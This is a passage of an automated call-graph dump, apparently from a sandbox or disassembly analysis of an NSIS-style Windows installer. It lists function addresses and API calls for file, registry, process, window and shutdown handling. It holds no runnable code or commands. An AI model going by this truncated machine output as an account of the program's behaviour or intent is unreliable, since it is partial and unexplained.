4667 401c80 4666->4667 4668 405ca0 MessageBoxIndirectW 4667->4668 4669 401a13 4668->4669 4677 402f6e 4678 402f72 4677->4678 4679 402fae 4677->4679 4680 4062a3 11 API calls 4678->4680 4681 40145c 18 API calls 4679->4681 4682 402f7d 4680->4682 4687 402f9d 4681->4687 4683 4062a3 11 API calls 4682->4683 4684 402f90 4683->4684 4685 402fa2 4684->4685 4686 402f98 4684->4686 4689 4060e7 9 API calls 4685->4689 4688 403e74 5 API calls 4686->4688 4688->4687 4689->4687 4690 4023f0 4691 402403 4690->4691 4692 4024da 4690->4692 4693 40145c 18 API calls 4691->4693 4694 404f72 25 API calls 4692->4694 4695 40240a 4693->4695 4700 4024f1 4694->4700 4696 40145c 18 API calls 4695->4696 4697 402413 4696->4697 4698 402429 LoadLibraryExW 4697->4698 4699 40241b GetModuleHandleW 4697->4699 4701 40243e 4698->4701 4702 4024ce 4698->4702 4699->4698 4699->4701 4714 406365 GlobalAlloc WideCharToMultiByte 4701->4714 4703 404f72 25 API calls 4702->4703 4703->4692 4705 402449 4706 40248c 4705->4706 4707 40244f 4705->4707 4708 404f72 25 API calls 4706->4708 4710 401435 25 API calls 4707->4710 4712 40245f 4707->4712 4709 402496 4708->4709 4711 4062a3 11 API calls 4709->4711 4710->4712 4711->4712 4712->4700 4713 4024c0 FreeLibrary 4712->4713 4713->4700 4715 406390 GetProcAddress 4714->4715 4716 40639d GlobalFree 4714->4716 4715->4716 4716->4705 4717 402df3 4718 402dfa 4717->4718 4720 4019ec 4717->4720 4719 402e07 FindNextFileW 4718->4719 4719->4720 4721 402e16 4719->4721 4723 406009 lstrcpynW 4721->4723 4723->4720 4076 402175 4077 401446 18 API calls 4076->4077 4078 40217c 4077->4078 4079 401446 18 API calls 4078->4079 4080 402186 4079->4080 4081 4062a3 11 API calls 4080->4081 4085 402197 4080->4085 4081->4085 4082 4021aa EnableWindow 4084 4030e3 4082->4084 4083 40219f ShowWindow 4083->4084 4085->4082 4085->4083 4731 404077 4732 404081 4731->4732 4733 404084 lstrcpynW lstrlenW 4731->4733 4732->4733 4102 405479 4103 405491 4102->4103 4104 4055cd 4102->4104 4103->4104 4105 40549d 4103->4105 4106 40561e 4104->4106 4107 4055de GetDlgItem GetDlgItem 4104->4107 4108 4054a8 SetWindowPos 4105->4108 4109 4054bb 4105->4109 4111 405678 4106->4111 4119 40139d 80 API calls 4106->4119 4110 403d3f 19 API calls 4107->4110 4108->4109 4113 4054c0 ShowWindow 4109->4113 4114 4054d8 4109->4114 4115 405608 SetClassLongW 4110->4115 4112 403daf SendMessageW 4111->4112 4132 4055c8 4111->4132 4142 40568a 4112->4142 4113->4114 4116 4054e0 DestroyWindow 4114->4116 4117 4054fa 4114->4117 4118 40141d 80 API calls 4115->4118 4171 4058dc 4116->4171 4120 405510 4117->4120 4121 4054ff SetWindowLongW 4117->4121 4118->4106 4122 405650 4119->4122 4125 4055b9 4120->4125 4126 40551c GetDlgItem 4120->4126 4121->4132 4122->4111 4127 405654 SendMessageW 4122->4127 4123 40141d 80 API calls 4123->4142 4124 4058de DestroyWindow KiUserCallbackDispatcher 4124->4171 4181 403dca 4125->4181 4130 40554c 4126->4130 4131 40552f SendMessageW IsWindowEnabled 4126->4131 4127->4132 4129 40590d ShowWindow 4129->4132 4134 405559 4130->4134 4135 4055a0 SendMessageW 4130->4135 4136 40556c 4130->4136 4145 405551 4130->4145 4131->4130 4131->4132 4133 406805 18 API calls 4133->4142 4134->4135 4134->4145 4135->4125 4139 405574 4136->4139 4140 405589 4136->4140 4138 403d3f 19 API calls 4138->4142 4143 40141d 80 API calls 4139->4143 4144 40141d 80 API calls 4140->4144 4141 405587 4141->4125 4142->4123 4142->4124 4142->4132 4142->4133 4142->4138 4162 40581e DestroyWindow 4142->4162 4172 403d3f 4142->4172 4143->4145 4146 405590 4144->4146 4178 403d18 4145->4178 4146->4125 4146->4145 4148 405705 GetDlgItem 4149 405723 ShowWindow KiUserCallbackDispatcher 4148->4149 4150 40571a 4148->4150 4175 403d85 KiUserCallbackDispatcher 4149->4175 4150->4149 4152 40574d EnableWindow 4155 405761 4152->4155 4153 405766 GetSystemMenu EnableMenuItem SendMessageW 4154 405796 SendMessageW 4153->4154 4153->4155 4154->4155 4155->4153 4176 403d98 SendMessageW 4155->4176 4177 406009 lstrcpynW 4155->4177 4158 4057c4 lstrlenW 4159 406805 18 API calls 4158->4159 4160 4057da SetWindowTextW 4159->4160 4161 40139d 80 API calls 4160->4161 4161->4142 4163 405838 CreateDialogParamW 4162->4163 4162->4171 4164 40586b 4163->4164 4163->4171 4165 403d3f 19 API calls 4164->4165 4166 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4165->4166 4167 40139d 80 API calls 4166->4167 4168 4058bc 4167->4168 4168->4132 4169 4058c4 ShowWindow 4168->4169 4170 403daf SendMessageW 4169->4170 4170->4171 4171->4129 4171->4132 4173 406805 18 API calls 4172->4173 4174 403d4a SetDlgItemTextW 4173->4174 4174->4148 4175->4152 4176->4155 4177->4158 4179 403d25 SendMessageW 4178->4179 4180 403d1f 4178->4180 4179->4141 4180->4179 4182 403ddf GetWindowLongW 4181->4182 4192 403e68 4181->4192 4183 403df0 4182->4183 4182->4192 4184 403e02 4183->4184 4185 403dff GetSysColor 4183->4185 4186 403e12 SetBkMode 4184->4186 4187 403e08 SetTextColor 4184->4187 4185->4184 4188 403e30 4186->4188 4189 403e2a GetSysColor 4186->4189 4187->4186 4190 403e41 4188->4190 4191 403e37 SetBkColor 4188->4191 4189->4188 4190->4192 4193 403e54 DeleteObject 4190->4193 4194 403e5b CreateBrushIndirect 4190->4194 4191->4190 4192->4132 4193->4194 4194->4192 4734 4020f9 GetDC GetDeviceCaps 4735 401446 18 API calls 4734->4735 4736 402116 MulDiv 4735->4736 4737 401446 18 API calls 4736->4737 4738 40212c 4737->4738 4739 406805 18 API calls 4738->4739 4740 402165 CreateFontIndirectW 4739->4740 4741 4030dc 4740->4741 4742 4030e3 4741->4742 4744 405f51 wsprintfW 4741->4744 4744->4742 4745 4024fb 4746 40145c 18 API calls 4745->4746 4747 402502 4746->4747 4748 40145c 18 API calls 4747->4748 4749 40250c 4748->4749 4750 40145c 18 API calls 4749->4750 4751 402515 4750->4751 4752 40145c 18 API calls 4751->4752 4753 40251f 4752->4753 4754 40145c 18 API calls 4753->4754 4755 402529 4754->4755 4756 40253d 4755->4756 4757 40145c 18 API calls 4755->4757 4758 4062a3 11 API calls 4756->4758 4757->4756 4759 40256a CoCreateInstance 4758->4759 4760 40258c 4759->4760 4761 40497c GetDlgItem GetDlgItem 4762 4049d2 7 API calls 4761->4762 4767 404bea 4761->4767 4763 404a76 DeleteObject 4762->4763 4764 404a6a SendMessageW 4762->4764 4765 404a81 4763->4765 4764->4763 4768 404ab8 4765->4768 4770 406805 18 API calls 4765->4770 4766 404ccf 4769 404d74 4766->4769 4774 404bdd 4766->4774 4779 404d1e SendMessageW 4766->4779 4767->4766 4777 40484e 5 API calls 4767->4777 4790 404c5a 4767->4790 4773 403d3f 19 API calls 4768->4773 4771 404d89 4769->4771 4772 404d7d SendMessageW 4769->4772 4776 404a9a SendMessageW SendMessageW 4770->4776 4781 404da2 4771->4781 4782 404d9b ImageList_Destroy 4771->4782 4792 404db2 4771->4792 4772->4771 4778 404acc 4773->4778 4780 403dca 8 API calls 4774->4780 4775 404cc1 SendMessageW 4775->4766 4776->4765 4777->4790 4783 403d3f 19 API calls 4778->4783 4779->4774 4785 404d33 SendMessageW 4779->4785 4786 404f6b 4780->4786 4787 404dab GlobalFree 4781->4787 4781->4792 4782->4781 4788 404add 4783->4788 4784 404f1c 4784->4774 4793 404f31 ShowWindow GetDlgItem ShowWindow 4784->4793 4789 404d46 4785->4789 4787->4792 4791 404baa GetWindowLongW SetWindowLongW 4788->4791 4800 404ba4 4788->4800 4803 404b39 SendMessageW 4788->4803 4804 404b67 SendMessageW 4788->4804 4805 404b7b SendMessageW 4788->4805 4799 404d57 SendMessageW 4789->4799 4790->4766 4790->4775 4794 404bc4 4791->4794 4792->4784 4795 404de4 4792->4795 4798 40141d 80 API calls 4792->4798 4793->4774 4796 404be2 4794->4796 4797 404bca ShowWindow 4794->4797 4808 404e12 SendMessageW 4795->4808 4811 404e28 4795->4811 4813 403d98 SendMessageW 4796->4813 4812 403d98 SendMessageW 4797->4812 4798->4795 4799->4769 4800->4791 4800->4794 4803->4788 4804->4788 4805->4788 4806 404ef3 InvalidateRect 4806->4784 4807 404f09 4806->4807 4814 4043ad 4807->4814 4808->4811 4810 404ea1 SendMessageW SendMessageW 4810->4811 4811->4806 4811->4810 4812->4774 4813->4767 4815 4043cd 4814->4815 4816 406805 18 API calls 4815->4816 4817 40440d 4816->4817 4818 406805 18 API calls 4817->4818 4819 404418 4818->4819 4820 406805 18 API calls 4819->4820 4821 404428 lstrlenW wsprintfW SetDlgItemTextW 4820->4821 4821->4784 4822 4026fc 4823 401ee4 4822->4823 4825 402708 4822->4825 4823->4822 4824 406805 18 API calls 4823->4824 4824->4823 4274 4019fd 4275 40145c 18 API calls 4274->4275 4276 401a04 4275->4276 4277 405e7f 2 API calls 4276->4277 4278 401a0b 4277->4278 4826 4022fd 4827 40145c 18 API calls 4826->4827 4828 402304 GetFileVersionInfoSizeW 4827->4828 4829 40232b GlobalAlloc 4828->4829 4833 4030e3 4828->4833 4830 40233f GetFileVersionInfoW 4829->4830 4829->4833 4831 402350 VerQueryValueW 4830->4831 4832 402381 GlobalFree 4830->4832 4831->4832 4835 402369 4831->4835 4832->4833 4839 405f51 wsprintfW 4835->4839 4837 402375 4840 405f51 wsprintfW 4837->4840 4839->4837 4840->4832 4841 402afd 4842 40145c 18 API calls 4841->4842 4843 402b04 4842->4843 4848 405e50 GetFileAttributesW CreateFileW 4843->4848 4845 402b10 4846 4030e3 4845->4846 4849 405f51 wsprintfW 4845->4849 4848->4845 4849->4846 4850 4029ff 4851 401553 19 API calls 4850->4851 4852 402a09 4851->4852 4853 40145c 18 API calls 4852->4853 4854 402a12 4853->4854 4855 402a1f RegQueryValueExW 4854->4855 4857 401a13 4854->4857 4856 402a3f 4855->4856 4860 402a45 4855->4860 4856->4860 4861 405f51 wsprintfW 4856->4861 4859 4029e4 RegCloseKey 4859->4857 4860->4857 4860->4859 4861->4860 4862 401000 4863 401037 BeginPaint GetClientRect 4862->4863 4864 40100c DefWindowProcW 4862->4864 4866 4010fc 4863->4866 4867 401182 4864->4867 4868 401073 CreateBrushIndirect FillRect DeleteObject 4866->4868 4869 401105 4866->4869 4868->4866 4870 401170 EndPaint 4869->4870 4871 40110b CreateFontIndirectW 4869->4871 4870->4867 4871->4870 4872 40111b 6 API calls 4871->4872 4872->4870 4873 401f80 4874 401446 18 API calls 4873->4874 4875 401f88 4874->4875 4876 401446 18 API calls 4875->4876 4877 401f93 4876->4877 4878 401fa3 4877->4878 4879 40145c 18 API calls 4877->4879 4880 401fb3 4878->4880 4881 40145c 18 API calls 4878->4881 4879->4878 4882 402006 4880->4882 4883 401fbc 4880->4883 4881->4880 4885 40145c 18 API calls 4882->4885 4884 401446 18 API calls 4883->4884 4887 401fc4 4884->4887 4886 40200d 4885->4886 4888 40145c 18 API calls 4886->4888 4889 401446 18 API calls 4887->4889 4890 402016 FindWindowExW 4888->4890 4891 401fce 4889->4891 4895 402036 4890->4895 4892 401ff6 SendMessageW 4891->4892 4893 401fd8 SendMessageTimeoutW 4891->4893 4892->4895 4893->4895 4894 4030e3 4895->4894 4897 405f51 wsprintfW 4895->4897 4897->4894 4898 402880 4899 402884 4898->4899 4900 40145c 18 API calls 4899->4900 4901 4028a7 4900->4901 4902 40145c 18 API calls 4901->4902 4903 4028b1 4902->4903 4904 4028ba RegCreateKeyExW 4903->4904 4905 4028e8 4904->4905 4912 4029ef 4904->4912 4906 402934 4905->4906 4907 40145c 18 API calls 4905->4907 4908 402963 4906->4908 4911 401446 18 API calls 4906->4911 4910 4028fc lstrlenW 4907->4910 4909 4029ae RegSetValueExW 4908->4909 4913 40337f 37 API calls 4908->4913 4916 4029c6 RegCloseKey 4909->4916 4917 4029cb 4909->4917 4914 402918 4910->4914 4915 40292a 4910->4915 4918 402947 4911->4918 4919 40297b 4913->4919 4920 4062a3 11 API calls 4914->4920 4921 4062a3 11 API calls 4915->4921 4916->4912 4922 4062a3 11 API calls 4917->4922 4923 4062a3 11 API calls 4918->4923 4929 406224 4919->4929 4925 402922 4920->4925 4921->4906 4922->4916 4923->4908 4925->4909 4928 4062a3 11 API calls 4928->4925 4930 406247 4929->4930 4931 40628a 4930->4931 4932 40625c wsprintfW 4930->4932 4933 402991 4931->4933 4934 406293 lstrcatW 4931->4934 4932->4931 4932->4932 4933->4928 4934->4933 4935 402082 4936 401446 18 API calls 4935->4936 4937 402093 SetWindowLongW 4936->4937 4938 4030e3 4937->4938 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3709 40141d 3520->3709 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3701 406c68 3529->3701 3706 405c3f CreateProcessW 3529->3706 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3712 406038 3546->3712 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3721 406722 lstrlenW CharPrevW 3549->3721 3728 405e50 GetFileAttributesW CreateFileW 3554->3728 3556 4035c7 3577 4035d7 3556->3577 3729 406009 lstrcpynW 3556->3729 3558 4035ed 3730 406751 lstrlenW 3558->3730 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3737 4032d2 3563->3737 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3771 403368 SetFilePointer 3565->3771 3748 403368 SetFilePointer 3567->3748 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3749 40337f 3571->3749 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3735 403336 ReadFile 3576->3735 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3812 405f51 wsprintfW 3585->3812 3813 405ed3 RegOpenKeyExW 3586->3813 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3795 403e95 3592->3795 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3819 403e74 3602->3819 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3818 406009 lstrcpynW 3620->3818 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3804 405047 OleInitialize 3626->3804 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3964 403c83 3640->3964 3641->3640 3647 405cb5 3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4021 406009 lstrcpynW 3651->4021 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4022 405e50 GetFileAttributesW CreateFileW 3674->4022 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3698 406812 3683->3698 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4025 406009 lstrcpynW 3684->4025 3685->3527 3685->3529 3687 4068d3 GetVersion 3687->3698 3688 406a46 lstrlenW 3688->3698 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3698 3693 406952 GetSystemDirectoryW 3693->3698 3694 406965 GetWindowsDirectoryW 3694->3698 3695 406038 5 API calls 3695->3698 3696 406805 10 API calls 3696->3698 3697 4069df lstrcatW 3697->3698 3698->3684 3698->3687 3698->3688 3698->3689 3698->3692 3698->3693 3698->3694 3698->3695 3698->3696 3698->3697 3699 406999 SHGetSpecialFolderLocation 3698->3699 4023 405f51 wsprintfW 3698->4023 4024 406009 lstrcpynW 3698->4024 3699->3698 3700 4069b1 SHGetPathFromIDListW CoTaskMemFree 3699->3700 3700->3698 3702 4062fc 3 API calls 3701->3702 3703 406c6f 3702->3703 3705 406c90 3703->3705 4026 406a99 lstrcpyW 3703->4026 3705->3529 3707 405c7a 3706->3707 3708 405c6e CloseHandle 3706->3708 3707->3529 3708->3707 3710 40139d 80 API calls 3709->3710 3711 401432 3710->3711 3711->3495 3718 406045 3712->3718 3713 4060bb 3714 4060c1 CharPrevW 3713->3714 3716 4060e1 3713->3716 3714->3713 3715 4060ae CharNextW 3715->3713 3715->3718 3716->3549 3717 405d06 CharNextW 3717->3718 3718->3713 3718->3715 3718->3717 3719 40609a CharNextW 3718->3719 3720 4060a9 CharNextW 3718->3720 3719->3718 3720->3715 3722 4037ea CreateDirectoryW 3721->3722 3723 40673f lstrcatW 3721->3723 3724 405e7f 3722->3724 3723->3722 3725 405e8c GetTickCount GetTempFileNameW 3724->3725 3726 405ec2 3725->3726 3727 4037fe 3725->3727 3726->3725 3726->3727 3727->3475 3728->3556 3729->3558 3731 406760 3730->3731 3732 4035f3 3731->3732 3733 406766 CharPrevW 3731->3733 3734 406009 lstrcpynW 3732->3734 3733->3731 3733->3732 3734->3562 3736 403357 3735->3736 3736->3576 3738 4032f3 3737->3738 3739 4032db 3737->3739 3742 403303 GetTickCount 3738->3742 3743 4032fb 3738->3743 3740 4032e4 DestroyWindow 3739->3740 3741 4032eb 3739->3741 3740->3741 3741->3565 3745 403311 CreateDialogParamW ShowWindow 3742->3745 3746 403334 3742->3746 3772 406332 3743->3772 3745->3746 3746->3565 3748->3571 3751 403398 3749->3751 3750 4033c3 3753 403336 ReadFile 3750->3753 3751->3750 3794 403368 SetFilePointer 3751->3794 3754 4033ce 3753->3754 3755 4033e7 GetTickCount 3754->3755 3756 403518 3754->3756 3758 4033d2 3754->3758 3768 4033fa 3755->3768 3757 40351c 3756->3757 3762 403540 3756->3762 3759 403336 ReadFile 3757->3759 3758->3580 3759->3758 3760 403336 ReadFile 3760->3762 3761 403336 ReadFile 3761->3768 3762->3758 3762->3760 3763 40355f WriteFile 3762->3763 3763->3758 3764 403574 3763->3764 3764->3758 3764->3762 3766 40345c GetTickCount 3766->3768 3767 403485 MulDiv wsprintfW 3783 404f72 3767->3783 3768->3758 3768->3761 3768->3766 3768->3767 3770 4034c9 WriteFile 3768->3770 3776 407312 3768->3776 3770->3758 3770->3768 3771->3572 3773 40634f PeekMessageW 3772->3773 3774 406345 DispatchMessageW 3773->3774 3775 403301 3773->3775 3774->3773 3775->3565 3777 407332 3776->3777 3778 40733a 3776->3778 3777->3768 3778->3777 3779 4073c2 GlobalFree 3778->3779 3780 4073cb GlobalAlloc 3778->3780 3781 407443 GlobalAlloc 3778->3781 3782 40743a GlobalFree 3778->3782 3779->3780 3780->3777 3780->3778 3781->3777 3781->3778 3782->3781 3784 404f8b 3783->3784 3793 40502f 3783->3793 3785 404fa9 lstrlenW 3784->3785 3786 406805 18 API calls 3784->3786 3787 404fd2 3785->3787 3788 404fb7 lstrlenW 3785->3788 3786->3785 3790 404fe5 3787->3790 3791 404fd8 SetWindowTextW 3787->3791 3789 404fc9 lstrcatW 3788->3789 3788->3793 3789->3787 3792 404feb SendMessageW SendMessageW SendMessageW 3790->3792 3790->3793 3791->3790 3792->3793 3793->3768 3794->3750 3796 403ea9 3795->3796 3824 405f51 wsprintfW 3796->3824 3798 403f1d 3799 406805 18 API calls 3798->3799 3800 403f29 SetWindowTextW 3799->3800 3802 403f44 3800->3802 3801 403f5f 3801->3595 3802->3801 3803 406805 18 API calls 3802->3803 3803->3802 3825 403daf 3804->3825 3806 40506a 3809 4062a3 11 API calls 3806->3809 3811 405095 3806->3811 3828 40139d 3806->3828 3807 403daf SendMessageW 3808 4050a5 OleUninitialize 3807->3808 3808->3632 3809->3806 3811->3807 3812->3592 3814 405f07 RegQueryValueExW 3813->3814 3815 405989 3813->3815 3816 405f29 RegCloseKey 3814->3816 3815->3590 3815->3591 3816->3815 3818->3597 3963 406009 lstrcpynW 3819->3963 3821 403e88 3822 406722 3 API calls 3821->3822 3823 403e8e lstrcatW 3822->3823 3823->3615 3824->3798 3826 403dc7 3825->3826 3827 403db8 SendMessageW 3825->3827 3826->3806 3827->3826 3831 4013a4 3828->3831 3829 401410 3829->3806 3831->3829 3832 4013dd MulDiv SendMessageW 3831->3832 3833 4015a0 3831->3833 3832->3831 3834 4015fa 3833->3834 3913 40160c 3833->3913 3835 401601 3834->3835 3836 401742 3834->3836 3837 401962 3834->3837 3838 4019ca 3834->3838 3839 40176e 3834->3839 3840 401650 3834->3840 3841 4017b1 3834->3841 3842 401672 3834->3842 3843 401693 3834->3843 3844 401616 3834->3844 3845 4016d6 3834->3845 3846 401736 3834->3846 3847 401897 3834->3847 3848 4018db 3834->3848 3849 40163c 3834->3849 3850 4016bd 3834->3850 3834->3913 3863 4062a3 11 API calls 3835->3863 3855 401751 ShowWindow 3836->3855 3856 401758 3836->3856 3860 40145c 18 API calls 3837->3860 3853 40145c 18 API calls 3838->3853 3857 40145c 18 API calls 3839->3857 3880 4062a3 11 API calls 3840->3880 3946 40145c 3841->3946 3858 40145c 18 API calls 3842->3858 3940 401446 3843->3940 3852 40145c 18 API calls 3844->3852 3869 401446 18 API calls 3845->3869 3845->3913 3846->3913 3962 405f51 wsprintfW 3846->3962 3859 40145c 18 API calls 3847->3859 3864 40145c 18 API calls 3848->3864 3854 401647 PostQuitMessage 3849->3854 3849->3913 3851 4062a3 11 API calls 3850->3851 3866 4016c7 SetForegroundWindow 3851->3866 3867 40161c 3852->3867 3868 4019d1 SearchPathW 3853->3868 3854->3913 3855->3856 3870 401765 ShowWindow 3856->3870 3856->3913 3871 401775 3857->3871 3872 401678 3858->3872 3873 40189d 3859->3873 3874 401968 GetFullPathNameW 3860->3874 3863->3913 3865 4018e2 3864->3865 3877 40145c 18 API calls 3865->3877 3866->3913 3878 4062a3 11 API calls 3867->3878 3868->3913 3869->3913 3870->3913 3881 4062a3 11 API calls 3871->3881 3882 4062a3 11 API calls 3872->3882 3958 4062d5 FindFirstFileW 3873->3958 3884 40197f 3874->3884 3926 4019a1 3874->3926 3876 40169a 3943 4062a3 lstrlenW wvsprintfW 3876->3943 3887 4018eb 3877->3887 3888 401627 3878->3888 3889 401664 3880->3889 3890 401785 SetFileAttributesW 3881->3890 3891 401683 3882->3891 3908 4062d5 2 API calls 3884->3908 3884->3926 3885 4062a3 11 API calls 3893 4017c9 3885->3893 3896 40145c 18 API calls 3887->3896 3897 404f72 25 API calls 3888->3897 3898 40139d 65 API calls 3889->3898 3899 40179a 3890->3899 3890->3913 3906 404f72 25 API calls 3891->3906 3951 405d59 CharNextW CharNextW 3893->3951 3895 4019b8 GetShortPathNameW 3895->3913 3904 4018f5 3896->3904 3897->3913 3898->3913 3905 4062a3 11 API calls 3899->3905 3900 4018c2 3909 4062a3 11 API calls 3900->3909 3901 4018a9 3907 4062a3 11 API calls 3901->3907 3911 4062a3 11 API calls 3904->3911 3905->3913 3906->3913 3907->3913 3912 401991 3908->3912 3909->3913 3910 4017d4 3914 401864 3910->3914 3917 405d06 CharNextW 3910->3917 3935 4062a3 11 API calls 3910->3935 3915 401902 MoveFileW 3911->3915 3912->3926 3961 406009 lstrcpynW 3912->3961 3913->3831 3914->3891 3916 40186e 3914->3916 3918 401912 3915->3918 3919 40191e 3915->3919 3920 404f72 25 API calls 3916->3920 3922 4017e6 CreateDirectoryW 3917->3922 3918->3891 3924 401942 3919->3924 3929 4062d5 2 API calls 3919->3929 3925 401875 3920->3925 3922->3910 3923 4017fe GetLastError 3922->3923 3927 401827 GetFileAttributesW 3923->3927 3928 40180b GetLastError 3923->3928 3934 4062a3 11 API calls 3924->3934 3957 406009 lstrcpynW 3925->3957 3926->3895 3926->3913 3927->3910 3931 4062a3 11 API calls 3928->3931 3932 401929 3929->3932 3931->3910 3932->3924 3937 406c68 42 API calls 3932->3937 3933 401882 SetCurrentDirectoryW 3933->3913 3936 40195c 3934->3936 3935->3910 3936->3913 3938 401936 3937->3938 3939 404f72 25 API calls 3938->3939 3939->3924 3941 406805 18 API calls 3940->3941 3942 401455 3941->3942 3942->3876 3944 4060e7 9 API calls 3943->3944 3945 4016a7 Sleep 3944->3945 3945->3913 3947 406805 18 API calls 3946->3947 3948 401488 3947->3948 3949 401497 3948->3949 3950 406038 5 API calls 3948->3950 3949->3885 3950->3949 3952 405d76 3951->3952 3953 405d88 3951->3953 3952->3953 3954 405d83 CharNextW 3952->3954 3955 405dac 3953->3955 3956 405d06 CharNextW 3953->3956 3954->3955 3955->3910 3956->3953 3957->3933 3959 4018a5 3958->3959 3960 4062eb FindClose 3958->3960 3959->3900 3959->3901 3960->3959 3961->3926 3962->3913 3963->3821 3965 403c91 3964->3965 3966 403876 3965->3966 3967 403c96 FreeLibrary GlobalFree 3965->3967 3968 406c9b 3966->3968 3967->3966 3967->3967 3969 40677e 18 API calls 3968->3969 3970 406cae 3969->3970 3971 406cb7 DeleteFileW 3970->3971 3972 406cce 3970->3972 4012 403882 CoUninitialize 3971->4012 3973 406e4b 3972->3973 4016 406009 lstrcpynW 